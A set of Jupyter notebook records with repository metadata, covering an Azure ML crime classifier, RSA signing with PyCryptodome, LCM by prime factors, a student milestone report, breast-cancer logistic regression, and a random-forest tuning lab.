"### Retrieve the Best Model",
"_____no_output_____"
]
],
[
[
"best_model_output = pipeline_run.get_pipeline_output(best_model_output_name)\nnum_file_downloaded = best_model_output.download('.', show_progress=True)",
"_____no_output_____"
],
[
"import pickle\n\nwith open(best_model_output._path_on_datastore, \"rb\" ) as f:\n best_model = pickle.load(f)\nbest_model",
"_____no_output_____"
]
],
[
[
"### Test the Model\n#### Load Test Data\nFor the test data, it should have the same preparation step as the train data. Otherwise it might get failed at the preprocessing step.",
"_____no_output_____"
]
],
[
[
"dataset = Dataset.Tabular.from_delimited_files(path='https://dprepdata.blob.core.windows.net/demo/crime0-test.csv')\ndf_test = dataset_test.to_pandas_dataframe()\ndf_test = df_test[pd.notnull(df['Primary Type'])]\n\ny_test = df_test[['Primary Type']]\nX_test = df_test.drop(['Primary Type', 'FBI Code'], axis=1)",
"_____no_output_____"
]
],
[
[
"#### Testing Our Best Fitted Model\n\nWe will use confusion matrix to see how our model works.",
"_____no_output_____"
]
],
[
[
"from pandas_ml import ConfusionMatrix\n\nypred = best_model.predict(X_test)\n\ncm = ConfusionMatrix(y_test['Primary Type'], ypred)\n\nprint(cm)\n\ncm.plot()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb04a2ec591ff3f384c68f7ca34d5c0aa95b04d5 | 3,346 | ipynb | Jupyter Notebook | .ipynb_checkpoints/signatures-checkpoint.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | null | null | null | .ipynb_checkpoints/signatures-checkpoint.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | 3 | 2021-05-02T21:05:01.000Z | 2021-05-07T01:53:21.000Z | signatures.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | null | null | null | 25.738462 | 281 | 0.581291 | [
[
[
"from Crypto.PublicKey import RSA\nfrom Crypto.Signature.pkcs1_15 import PKCS115_SigScheme\nfrom Crypto.Hash import SHA256\nimport Crypto.Cipher\nfrom Crypto.Cipher import PKCS1_OAEP\nimport binascii\nimport base64\nimport ast\n# Generate 1024-bit RSA key pair (private + public key)\nkeyPair = RSA.generate(bits=1024)\npubKey = keyPair.publickey()\n\n# Encrypt keys\ntext= b'encrypting'\nencryptor = PKCS1_OAEP.new(pubKey)\nencrypted = encryptor.encrypt(text)\nprint(keyPair)",
"Private RSA key at 0x7FAC3531AEE0\n"
],
[
"decryptor = PKCS1_OAEP.new(keyPair)\ndecrypted = decryptor.decrypt(ast.literal_eval(str(encrypted)))\nprint(decrypted)",
"b'encrypting'\n"
],
[
"# Sign the message using the PKCS#1 v1.5 signature scheme (RSASP1)\nmsg = b'Message for RSA signing'\nhash = SHA256.new(msg)\nsigner = PKCS115_SigScheme(keyPair)\nsignature = signer.sign(hash)\nprint(\"Signature:\", binascii.hexlify(signature))\n\n# Verify valid PKCS#1 v1.5 signature (RSAVP1)\nmsg = b'Message for RSA signing'\nhash = SHA256.new(msg)\nverifier = PKCS115_SigScheme(pubKey)\ntry:\n verifier.verify(hash, signature)\n print(\"Signature is valid.\")\nexcept:\n print(\"Signature is invalid.\")\n\n# Verify invalid PKCS#1 v1.5 signature (RSAVP1)\nmsg = b'A tampered message'\nhash = SHA256.new(msg)\nverifier = PKCS115_SigScheme(pubKey)\ntry:\n verifier.verify(hash, signature)\n print(\"Signature is valid.\")\nexcept:\n print(\"Signature is invalid.\")\n ",
"Signature: b'318668084349c5a2fca31b0a3fac8b109928e74feb4ad402b44754a19bae2218b11c43f96d87d29ce428c3fc9d5f0ca5a31123d378c1465020a22c3cabcde5b6565c725cef00e7f40f30dd164f665611707e83b1ccae0dcc44b5751fa7347f32c06053ccb1c99fb8d35759d244662698d12b3a1e1364140d49b67339b3e6a6b1'\nSignature is valid.\nSignature is invalid.\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb04b5d03bde86a3a7857b81aa5c1433a691a5a7 | 3,599 | ipynb | Jupyter Notebook | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | 26.270073 | 412 | 0.560711 | [
[
[
"import number_theory_functions as f\nprint('Dependencies imported')",
"Dependencies imported\n"
]
],
[
[
"## The Least Common Multiple (LCM) of two integers can be found by figuring out their prime factors.",
"_____no_output_____"
]
],
[
[
"# For example let's take integers a and b\na=6\nb=10\nprint(\"factors of a:\",f.prime_factors_list(a))\nprint(\"factors of b:\",f.prime_factors_list(b))\n\n# Notice that if the two numbers have common factors these will be present in the lcm only once \nlcm=f.lcm(a,b)\nprint(\"lcm({},{})={}\".format(a, b, lcm))\nprint(\"and its prime factors are:\", f.prime_factors_list(lcm))",
"factors of a: [2, 3]\nfactors of b: [2, 5]\nlcm(6,10)=30\nand its prime factors are: [2, 3, 5]\n"
],
[
"# It is only logical when you think of numbers as of collections of their factors\nlist_of_factors=[7,3,2]\nprint(\"factors: \", list_of_factors)\n\nnumber=f.number_from(list_of_factors)\nprint(\"the number from the factors: \", number)",
"factors: [7, 3, 2]\nthe number from the factors: 42\n"
],
[
"# Such a number (or the super collection) will be the multiple of every sub-collection\n\ncol_a=list_of_factors[0:-1]\nna=f.number_from(col_a)\n\ncol_b=list_of_factors[1:]\nnb=f.number_from(col_b)\n\nprint(\"All factors, except the last: {} would form a number {}.\".format(col_a, na))\nprint(\"All factors, except the first: {} would form a number {}.\".format(col_b, nb))",
"All factors, except the last: [7, 3] would form a number 21.\nAll factors, except the first: [3, 2] would form a number 6.\n"
]
],
[
[
"For a number to be the LEAST common multiple of two numbers it's collection of factors should include only those, that are present in at least one of the two numbers and no more extra factors. By the fundamental theorem of arithmetic every number has a unique collection of prime factors, that's why we can use them for being the collections and don't be afraid of forgeting that for example 12 has 2 of 6.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb04c72d73402ca956ad1998dce1c328489a7c0c | 2,772 | ipynb | Jupyter Notebook | Milestone3.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | 2 | 2020-03-31T20:42:00.000Z | 2020-05-31T19:50:03.000Z | .ipynb_checkpoints/Milestone3-checkpoint.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Milestone3-checkpoint.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | 2 | 2020-04-01T00:11:10.000Z | 2020-10-01T23:29:18.000Z | 40.764706 | 298 | 0.616522 | [
[
[
"# Project Milestone -- 3\n\n## Group 1 -- SARSA\n\n\n| Deliverable | Percent Complete | Estimated Completion Date | Percent Complete by Next Milestone \n| --- | --- | --- | --- |\n| Code | 50% | Apr 23 | 100% |\n| Paper | 30% | Apr 23 | 100% |\n| Demo | 20% | May 01 | 80% |\n| Presentation | 20% | May 01 | 80% |\n\n\n1. What deliverable goals established in the last milestone report were accomplished to the anticipated percentage? \n \n Our goals for the paper, demo and the presentation were achieved as predicted. We have started on all three of those and added a bit.\n \n\n2. What deliverable goals established in the last milestone report were not accomplished to the anticipated percentage? \n \n The goal of our code was not fully accomplished. We have a working demo available, but we are still undecided on whether that portion of the code is what will be the final code. We are looking to research a little more on different possible networks that will work better in our case. \n\n\n3. What are the main deliverable goals to meet before the next milestone report, and who is working on them?\n\n Girgis Shihataa -- Finish up research on the YoloV3 network. Finish up the paper portion of the project.\n\n William Smith -- Working on the paper with Girgis.\n\n Justin Hill -- Continue working on YoloV3 and presentation.\n \n Michael Ketzner -- I'll continue looking into working on a YOLO network and maybe work on an interface to monitor a parking lot with the current CNN that we have.\n\n Carolous Ghobrial -- Continue working on the Yolo V3 network, and assist with the paper and presentation.\n\n Mubarek Mohammed -- I am working the YOLOv3 architecture. I recently used a pre-trained model to classify cars and motorcycles. The next step I was planning was making the model architecture. I can also continue working on the CNN to diversify compared to everyone else work on YOLOv3.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown"
]
] |
cb04c864af4ceac9eb5b4d8e51e021577d082ed0 | 107,953 | ipynb | Jupyter Notebook | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | 1 | 2020-01-05T10:37:49.000Z | 2020-01-05T10:37:49.000Z | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | null | null | null | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | 1 | 2020-01-10T16:06:17.000Z | 2020-01-10T16:06:17.000Z | 107.737525 | 74,812 | 0.793382 | [
[
[
"# Breast-Cancer Classification",
"_____no_output_____"
]
],
[
[
"#WOHOO already Version 2 I learned How to explore Data",
"_____no_output_____"
]
],
[
[
"# Library",
"_____no_output_____"
]
],
[
[
"# Import Dependencies\n%matplotlib inline\n\n# Start Python Imports\nimport math, time, random, datetime\n\n# Data Manipulation\nimport numpy as np\nimport pandas as pd\n\n# Visualization \nimport matplotlib.pyplot as plt\nimport missingno\nimport seaborn as sns\nplt.style.use('seaborn-whitegrid')\n\n# Preprocessing\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder, label_binarize\n\n# Machine learning\nimport catboost\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import model_selection, tree, preprocessing, metrics, linear_model\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom catboost import CatBoostClassifier, Pool, cv\n\n# Let's be rebels and ignore warnings for now\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
]
],
[
[
"# Exploring the dataset",
"_____no_output_____"
]
],
[
[
"dataset = pd.read_csv('data.csv')\ndataset.drop('Unnamed: 32', inplace=True, axis=1)",
"_____no_output_____"
],
[
"dataset.head()",
"_____no_output_____"
],
[
"# Plot graphic of missing values\nmissingno.matrix(dataset, figsize = (30,10))\n",
"_____no_output_____"
],
[
"dataset.columns",
"_____no_output_____"
],
[
"print(dataset.shape)\ndataset.describe()",
"(569, 32)\n"
],
[
"dataset.isnull().sum()",
"_____no_output_____"
],
[
"X = dataset.iloc[:, 2:].values\ny = dataset.iloc[:, 1:2].values ",
"_____no_output_____"
]
],
[
[
"# spliting the dataset",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2)",
"_____no_output_____"
],
[
"#categorical values\nfrom sklearn.preprocessing import LabelEncoder\nlabel_y = LabelEncoder()\ny_train = label_y.fit_transform(y_train)\ny_test = label_y.transform(y_test)",
"_____no_output_____"
]
],
[
[
"# Method 1",
"_____no_output_____"
],
[
"## Fitting the model and analysing",
"_____no_output_____"
]
],
[
[
"#fitting\nfrom sklearn.linear_model import LogisticRegression\nclassifier = LogisticRegression(n_jobs= -1)\nclassifier.fit(X_train, y_train)",
"_____no_output_____"
],
[
"#predicting\ny_pred = classifier.predict(X_test)",
"_____no_output_____"
],
[
"#confusion matrix\nfrom sklearn.metrics import confusion_matrix\nconfusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"# classification analysis\nfrom sklearn.metrics import classification_report\nprint(classification_report(y_test, y_pred))",
" precision recall f1-score support\n\n 0 0.97 0.96 0.97 77\n 1 0.92 0.95 0.93 37\n\n micro avg 0.96 0.96 0.96 114\n macro avg 0.95 0.95 0.95 114\nweighted avg 0.96 0.96 0.96 114\n\n"
],
[
"# k-fold cross vallidation\nfrom sklearn.model_selection import cross_val_score\naccuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train,cv= 10, n_jobs=-1)\nprint(accuracies.mean(), accuracies.std())",
"0.9495652173913044 0.029335408199644544\n"
]
],
[
[
"# Method 2 ",
"_____no_output_____"
],
[
"# Function that runs the requested algorithm and returns the accuracy metrics",
"_____no_output_____"
]
],
[
[
"def fit_ml_algo(algo, X_train, y_train, cv):\n \n # One Pass\n model = algo.fit(X_train, y_train)\n acc = round(model.score(X_train, y_train) * 100, 2)\n \n # Cross Validation \n train_pred = model_selection.cross_val_predict(algo, \n X_train, \n y_train, \n cv=cv, \n n_jobs = -1)\n # Cross-validation accuracy metric\n acc_cv = round(metrics.accuracy_score(y_train, train_pred) * 100, 2)\n \n return train_pred, acc, acc_cv",
"_____no_output_____"
],
[
"start_time = time.time()\ntrain_pred_log, acc_log, acc_cv_log = fit_ml_algo(LogisticRegression(), \n X_train, \n y_train, \n 10)\nlog_time = (time.time() - start_time)\nprint(\"Accuracy: %s\" % acc_log)\nprint(\"Accuracy CV 10-Fold: %s\" % acc_cv_log)\nprint(\"Running Time: %s\" % datetime.timedelta(seconds=log_time))",
"Accuracy: 95.38\nAccuracy CV 10-Fold: 94.95\nRunning Time: 0:00:00.078176\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb04c8afa9027491bde6ce83b3d08a7957cc6c66 | 33,520 | ipynb | Jupyter Notebook | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 300 | 2019-07-23T17:30:45.000Z | 2022-03-28T18:45:16.000Z | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 1 | 2019-11-19T05:42:19.000Z | 2019-12-04T20:16:26.000Z | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 128 | 2019-08-02T20:11:35.000Z | 2022-03-27T19:12:24.000Z | 26.393701 | 430 | 0.547584 | [
[
[
"# Exploring Random Forests",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\n\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.datasets import load_boston, load_iris, load_wine, load_digits, \\\n load_breast_cancer, load_diabetes\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score\n\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\n\nimport matplotlib.pyplot as plt\n%config InlineBackend.figure_format = 'retina'\n\nfrom rfpimp import *\n\nfrom distutils.version import LooseVersion\nif LooseVersion(sklearn.__version__) >= LooseVersion(\"0.24\"):\n # In sklearn version 0.24, forest module changed to be private.\n from sklearn.ensemble._forest import _generate_unsampled_indices\n from sklearn.ensemble import _forest as forest\nelse:\n # Before sklearn version 0.24, forest was public, supporting this.\n from sklearn.ensemble.forest import _generate_unsampled_indices\n from sklearn.ensemble import forest\n\nfrom sklearn import tree\nfrom dtreeviz.trees import *",
"_____no_output_____"
],
[
"def rent(n=None, bootstrap=False):\n df_rent = pd.read_csv(\"data/rent-ideal.csv\")\n if n is None:\n n = len(df_rent)\n df_rent = df_rent.sample(n, replace=bootstrap)\n X = df_rent[['bedrooms','bathrooms','latitude','longitude']]\n y = df_rent['price']\n return X, y\n\ndef boston():\n boston = load_boston()\n X = boston.data\n y = boston.target\n features = boston.feature_names\n df = pd.DataFrame(data=X,columns=features)\n df['y'] = y\n return df",
"_____no_output_____"
]
],
[
[
"## Set up\n\nGet the `rent-ideal.csv` data file from canvas \"files area\" and store in the data directory underneath your notebook directory.",
"_____no_output_____"
]
],
[
[
"X, y = rent()\nX.head(3)",
"_____no_output_____"
],
[
"X.shape",
"_____no_output_____"
]
],
[
[
"## Train random forests of different sizes\n\nAs we increase the number of trees in the forest, we initially see model bias going down. It will asymptotically approach some minimum error on the testing set.",
"_____no_output_____"
]
],
[
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)",
"_____no_output_____"
]
],
[
[
"Here's how to train a random forest that has a single tree:",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=1)\nrf.fit(X_train, y_train)",
"_____no_output_____"
]
],
[
[
"**Task**: Compute the MAE for the training and the testing set, printing them out.",
"_____no_output_____"
]
],
[
[
"mae_train = mean_absolute_error(...)\nmae = mean_absolute_error(...)\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Task**: Run the training and testing cycle several times to see the variance: the test scores bounce around a lot.",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 2, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=2)\nrf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"You should notice the both test MAE scores going down and bouncing around less from run to run.",
"_____no_output_____"
],
[
"**Q.** Why does the MAE score go down?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n With 2 trees, the chances are that the random forest will have seen (trained on) more of the original training set, despite bootstrapping.\n</details>",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 10, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=10)\nrf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThey are getting smaller.\n</details>",
"_____no_output_____"
],
[
"**Q.** After running several times, what else do you notice?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n With 10 trees, the prediction from run to run varies a lot less. We have reduced variance, improving generality.\n</details>",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 200, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200)\n%time rf.fit(X_train, y_train) # how long does this take?\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores from a single run?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThey are a bit smaller, but not by much.\n</details>",
"_____no_output_____"
],
[
"**Task**: Notice that it took a long time to train, about 10 seconds. Do the exact same thing again but this time use `n_jobs=-1` as an argument to the `RandomForestRegressor` constructor.\n\nThis tells the library to use all processing cores available on the computer processor. As long as the data is not too huge (because it must pass it around), it often goes much faster using this argument. It should take less than two seconds.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200, n_jobs=-1)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores from SEVERAL runs?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThe error variance across runs is even lower (tighter).\n</details>",
"_____no_output_____"
],
[
"## Examining model size and complexity\n\nThe structure of a tree is affected by a number of hyper parameters, not just the data. Goal in the section is to see the effect of altering the number of samples per leaf and the maximum number of candidate features per split. Let's start out with a handy function that uses some support code from rfpimp to examine tree size and depth:",
"_____no_output_____"
]
],
[
[
"def showsize(ntrees, max_features=1.0, min_samples_leaf=1):\n rf = RandomForestRegressor(n_estimators=ntrees,\n max_features=max_features,\n min_samples_leaf=min_samples_leaf,\n n_jobs=-1)\n rf.fit(X_train, y_train)\n n = rfnnodes(rf) # from rfpimp\n h = np.median(rfmaxdepths(rf)) # rfmaxdepths from rfpimp\n mae_train = mean_absolute_error(y_train, rf.predict(X_train))\n mae = mean_absolute_error(y_test, rf.predict(X_test))\n print(f\"MAE train {mae_train:6.1f}$, test {mae:6.1f}$ using {n:9,d} tree nodes with {h:2.0f} median tree height\")",
"_____no_output_____"
]
],
[
[
"### Effect of number of trees",
"_____no_output_____"
],
[
"For a single tree, we see about 21,000 nodes and a tree height of around 35:",
"_____no_output_____"
]
],
[
[
"showsize(ntrees=1)",
"_____no_output_____"
]
],
[
[
"**Task**: Look at the metrics for 2 trees and then 100 trees.",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n<pre>\nshowsize(ntrees=2)\nshowsize(ntrees=100)\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** Why does the median height of a tree stay the same when we increase the number of trees?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nWhile the number of nodes increases with the number of trees, the height of any individual tree will stay the same because we have not fundamentally changed how it is constructing a single tree.\n</details>",
"_____no_output_____"
],
[
"### Effect of increasing min samples / leaf",
"_____no_output_____"
],
[
"**Task**: Loop around a call to `showsize()` with 10 trees and min_samples_leaf=1..10 ",
"_____no_output_____"
]
],
[
[
"for i in range(...):\n print(f\"{i:2d} \",end='')\n showsize(...)",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nfor i in range(1,10+1):\n showsize(ntrees=10, min_samples_leaf=i)\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** Why do the median height of a tree and number of total nodes decrease as we increase the number of samples per leaf?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nBecause when the sample size gets down to `min_samples_leaf`, splitting stops, which prevents the tree from getting taller. It also restricts how many nodes total get created for the tree.\n</details> ",
"_____no_output_____"
],
[
"**Q.** Why does the MAE error increase?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nIf we include more observations in a single leaf, then the average is taken over more samples. That average is a more general prediction but less accurate.\n</details> ",
"_____no_output_____"
],
[
"It's pretty clear from that print out that `min_samples_leaf=1` is the best choice because it gives the minimum validation error.",
"_____no_output_____"
],
[
"### Effect of reducing max_features (rent data)",
"_____no_output_____"
],
[
"**Task:** Do another loop from `max_features` = 4 down to 1, with 1 sample per leaf. (There are 4 total features.)",
"_____no_output_____"
]
],
[
[
"p = X_train.shape[1]\nfor i in range(...):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=10, ...)",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\np = X_train.shape[1]\nfor i in range(p,0,-1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=10, max_features=i)\n</pre>\n</details>",
"_____no_output_____"
],
[
"For this data set, changing the available candidate features that each split does not seem to be important as the validation error does not change, nor does the height of the trees.",
"_____no_output_____"
],
[
"### Examine effects of hyper parameters on Boston data set",
"_____no_output_____"
]
],
[
[
"df_boston = boston()\ndf_boston.head(3)",
"_____no_output_____"
],
[
"X, y = df_boston.drop('y', axis=1), df_boston['y']\ny *= 1000 # y is \"Median value of owner-occupied homes in $1000's\" so multiply by 1000\n\n# reproducible 20% test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=1)",
"_____no_output_____"
]
],
[
[
"Let's run the metric `showsize()` function to see how many trees we should use:",
"_____no_output_____"
]
],
[
[
"for i in [1,5,30,50,100,150,300]:\n print(f\"{i:3d} trees: \", end='')\n showsize(ntrees=i)",
"_____no_output_____"
]
],
[
[
"Seems like the sweet spot on the validation error is probably 150 trees as it gets a low validation error and has a fairly small set of trees.",
"_____no_output_____"
],
[
"Check the effect of increasing the minimum samples per leaf from 1 to 10 as we did before.",
"_____no_output_____"
]
],
[
[
"for i in range(1,10+1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=150, min_samples_leaf=i)",
"_____no_output_____"
]
],
[
[
"The training error goes up dramatically but the validation error doesn't get too much worse. ",
"_____no_output_____"
],
[
"**Q.** Which min samples per leaf would you choose?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n After running a few times, it seems that using <tt>min_samples_leaf</tt>=1 or 2 is best for the validation error. But, keep in mind that this data set is pretty small and so our error values will change quite a bit depending on the sample we get for the test set.\n</details> ",
"_____no_output_____"
],
[
"Run a loop from the maximum number of features down to 1 for `max_features` to see the effects.",
"_____no_output_____"
]
],
[
[
"p = X_train.shape[1]\nfor i in range(p,0,-1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=150, max_features=i, min_samples_leaf=3)",
"_____no_output_____"
]
],
[
[
"**Q.** Which max features would you choose?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n After running a few times, it seems that using <tt>max_features</tt>=7 or 13 gets best validation error, but again it depends on the randomness of the tree construction and results will vary across runs.\n</details> ",
"_____no_output_____"
],
[
"Here's what the final model would look like:",
"_____no_output_____"
]
],
[
[
"showsize(ntrees=150, max_features=13, min_samples_leaf=1)",
"_____no_output_____"
]
],
[
[
"## RF prediction confidence\n\nA random forest is a collection of decision trees, each of which contributes a prediction. The forest averages those predictions to provide the overall prediction (or takes most common vote for classification). Let's dig inside the random forest to get the individual trees out and ask them what their predictions are.",
"_____no_output_____"
],
[
"**Task**: Train a random forest with 10 trees on `X_train`, `y_train`. Use `for t in rf.estimators_` to iterate through the trees making predictions with `t` not `rf`. Print out the usual MAE scores for each tree predictor.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=10, n_jobs=-1)\nrf.fit(X_train, y_train)\n\nfor t in ...:\n mae_train = ...\n mae = ...\n print(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=10, n_jobs=-1)\nrf.fit(X_train, y_train)\n\nfor t in rf.estimators_:\n mae_train = mean_absolute_error(y_train, t.predict(X_train))\n mae = mean_absolute_error(y_test, t.predict(X_test))\n print(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"Notice that it bounces around quite a bit. ",
"_____no_output_____"
],
[
"**Task**: Select one of the `X_test` rows and print out the addicted rent price.",
"_____no_output_____"
]
],
[
[
"x = ... # pick single test case\nx = x.values.reshape(1,-1) # Needs to be a one-row matrix\n\nprint(f\"{x} => {rf.predict(x)}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nx = X_test.iloc[3,:] # pick single test case\nx = x.values.reshape(1,-1)\nprint(f\"{x} => {rf.predict(x)}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
